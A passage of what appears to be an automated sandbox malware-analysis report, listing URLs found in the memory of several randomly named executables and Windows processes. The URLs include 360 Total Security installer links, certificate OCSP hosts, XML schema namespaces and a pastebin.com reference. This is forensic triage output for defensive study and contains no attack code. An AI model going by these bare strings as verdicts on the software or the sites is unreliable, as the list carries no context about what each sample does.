Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1286798746.0000000002364000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284177603.0000000002365000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1283481251.0000000002362000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cabmi#
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cabsM
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cabupdate
Source: explorer.exe, 00000024.00000000.1373594900.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1419179675.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: lgX7lgUL1w.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: svchost.exe, 00000034.00000002.2798278482.000001F4D86E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://passport.net/tb
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C57000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://pinst.360.cn/360se/wssj_setup.cabGdiplus.dllGdiplusStartupGdiplusShutdownGdipCreateFromHDCGdi
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://pinst.360.cn/zhuomian/desktopsafe.cabSoftware
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://s.360safe.com/360ts/mini_inst.htm?ver=%s&pid=%s&os=%s&mid=%s&state=%d&opr_state=%xhttp://s.36
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.000000000238E000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1286254522.0000000002398000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290104611.0000000002396000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1289228498.000000000238B000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290342269.0000000002396000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284301934.0000000002395000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290049082.000000000238E000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290260751.0000000002390000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1289284504.0000000002396000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360safe.com/360ts/mini_inst.htm?ver=6.6.0.1054&pid=WW.Marketator.CPI20230405&os=10.0&mid=d1
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360safe.com/safei18n/Administrators
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360safe.com/safei18n/ins_err.htm?
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1286798746.0000000002364000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284177603.0000000002365000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360safe.com/safei18n/ins_err.htm?Y0
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360safe.com/safei18n/ins_err.htm?a_in
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360safe.com/safei18n/ins_err.htm?ng
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360safe.com/safei18n/ins_err.htm?v
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.000000000238E000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1289374138.000000000238C000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1289228498.000000000238B000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1289736494.0000000002390000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290049082.000000000238E000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290260751.0000000002390000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1289545001.000000000238C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360safe.com/safei18n/query_env.htm?v611=DgY0MAEISzsPjAABAACQzFb6wVHXXWs%2B6pvndVYv5qYQpcmgc
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360totalsecurity.com/safei18n/ins.htm?mid=%s&ver=%s&lan=%s&os=%s&ch=%s&sch=%s&ue=%sMainDlg7
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.360totalsecurity.com/safei18n/ins_pb.html?mid=%s&m2=%s&ver=%s&lan=%s&os=%s&ch=%s&sch=%s&ue=
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: explorer.exe, 00000024.00000000.1392491948.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.1385253121.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.1393801896.0000000008820000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: o2i3jroi23joj23ikrjokij3oroi[1].exe.19.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426040285.000000000582C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1430346079.0000000005F14000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420334429.0000000005373000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417014257.0000000005150000.00000004.00000020.00020000.00000000.sdmp, o2i3jroi23joj23ikrjokij3oroi[1].exe.19.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426040285.000000000582C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1430346079.0000000005F14000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420334429.0000000005373000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417014257.0000000005150000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2848207235.000001F4D8F5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1445192248.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1444091539.000001F4D8F0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1441433291.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1440306042.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1451691032.000001F4D8F0E000.00000004.00000020.00020000.00000000.sdmp, o2i3jroi23joj23ikrjokij3oroi[1].exe.19.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: o2i3jroi23joj23ikrjokij3oroi[1].exe.19.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/http
Source: svchost.exe, 00000034.00000003.1879020680.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2005631697.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2843127559.000001F4D8F3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2355545799.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 00000034.00000003.1932054883.000001F4D9907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2355545799.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1870800855.000001F4D9919000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1932215297.000001F4D9904000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1926743882.000001F4D9907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 00000034.00000002.2843127559.000001F4D8F3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2355545799.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyce
Source: svchost.exe, 00000034.00000002.2843127559.000001F4D8F3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policyn
Source: svchost.exe, 00000034.00000002.2843127559.000001F4D8F3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2355545799.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 00000034.00000003.1932398520.000001F4D9918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc(
Source: svchost.exe, 00000034.00000002.2843127559.000001F4D8F3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc0U=
Source: svchost.exe, 00000034.00000002.2848207235.000001F4D8F5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc4
Source: svchost.exe, 00000034.00000003.2355545799.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scce
Source: svchost.exe, 00000034.00000002.2843127559.000001F4D8F3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scd
Source: svchost.exe, 00000034.00000003.2005631697.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2843127559.000001F4D8F3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2355545799.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scicy
Source: svchost.exe, 00000034.00000003.2355545799.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1932215297.000001F4D9904000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1926743882.000001F4D9907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 00000034.00000003.1813056613.000001F4D8F31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1811899775.000001F4D8F5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1895135423.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1813056613.000001F4D8F2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1885812972.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2005894505.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1803514742.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 00000034.00000003.1909947828.000001F4D8F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue
Source: svchost.exe, 00000034.00000003.2005894505.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1909947828.000001F4D8F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 00000034.00000002.2848207235.000001F4D8F5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1909947828.000001F4D8F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: svchost.exe, 00000034.00000002.2843127559.000001F4D8F3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2355545799.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustnce
Source: lgX7lgUL1w.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: lgX7lgUL1w.exe, 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidX
Source: lgX7lgUL1w.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
Source: lgX7lgUL1w.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lgX7lgUL1w.exe, 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameX
Source: o2i3jroi23joj23ikrjokij3oroi[1].exe.19.dr	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: o2i3jroi23joj23ikrjokij3oroi[1].exe.19.dr	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/mime/
Source: o2i3jroi23joj23ikrjokij3oroi[1].exe.19.dr	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426040285.000000000582C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413421005.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1430346079.0000000005F14000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420334429.0000000005373000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417014257.0000000005150000.00000004.00000020.00020000.00000000.sdmp, o2i3jroi23joj23ikrjokij3oroi[1].exe.19.dr	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/#
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1258256388.000000000056E000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.360safe.com/totalsecurity/en/101/tswin10u/d7http://www.360safe.com/totalsecurity/en/101/t
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284177603.0000000002365000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1283481251.0000000002362000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/$:
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/d/ts/%s/%s/QHSafeTray.exe360Tray.exe%snosign.htm?f=%s&re=%s&mid=%s&v
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290260751.0000000002390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/en/license.html
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/en/license.html/6
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1292305392.000000000239F000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.000000000238E000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290316703.000000000239C000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290260751.0000000002390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/en/license.html0
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/en/license.html7
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284556920.0000000002389000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/en/license.html9
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1289374138.0000000002389000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/en/license.html:
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/en/license.html=7
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1292305392.000000000239F000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.000000000238E000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290316703.000000000239C000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290260751.0000000002390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/en/license.htmlV
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1289374138.0000000002389000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.360totalsecurity.com/en/license.html_
